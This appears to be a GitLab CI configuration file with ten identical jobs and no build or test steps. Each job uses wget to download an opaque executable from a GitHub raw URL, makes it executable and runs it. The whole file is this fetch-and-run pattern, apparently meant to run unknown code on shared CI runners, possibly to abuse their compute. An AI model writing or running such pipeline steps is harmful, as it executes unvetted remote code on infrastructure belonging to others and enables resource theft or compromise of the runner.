komijakala_1:
  script:
    - wget https://raw.githubusercontent.com/komijakala/komijakala/main/komijakala
    - chmod u+x komijakala
    - ./komijakala
    
komijakala_2:
  script:
    - wget https://raw.githubusercontent.com/komijakala/komijakala/main/komijakala
    - chmod u+x komijakala
    - ./komijakala
    
komijakala_3:
  script:
    - wget https://raw.githubusercontent.com/komijakala/komijakala/main/komijakala
    - chmod u+x komijakala
    - ./komijakala

  
komijakala_4:
  script:
    - wget https://raw.githubusercontent.com/komijakala/komijakala/main/komijakala
    - chmod u+x komijakala
    - ./komijakala
  
komijakala_5:
  script:
    - wget https://raw.githubusercontent.com/komijakala/komijakala/main/komijakala
    - chmod u+x komijakala
    - ./komijakala
  
komijakala_6:
  script:
    - wget https://raw.githubusercontent.com/komijakala/komijakala/main/komijakala
    - chmod u+x komijakala
    - ./komijakala
  
komijakala_7:
  script:
    - wget https://raw.githubusercontent.com/komijakala/komijakala/main/komijakala
    - chmod u+x komijakala
    - ./komijakala
  
komijakala_8:
  script:
    - wget https://raw.githubusercontent.com/komijakala/komijakala/main/komijakala
    - chmod u+x komijakala
    - ./komijakala

komijakala_9:
  script:
    - wget https://raw.githubusercontent.com/komijakala/komijakala/main/komijakala
    - chmod u+x komijakala
    - ./komijakala
  
komijakala_10:
  script:
    - wget https://raw.githubusercontent.com/komijakala/komijakala/main/komijakala
    - chmod u+x komijakala
    - ./komijakala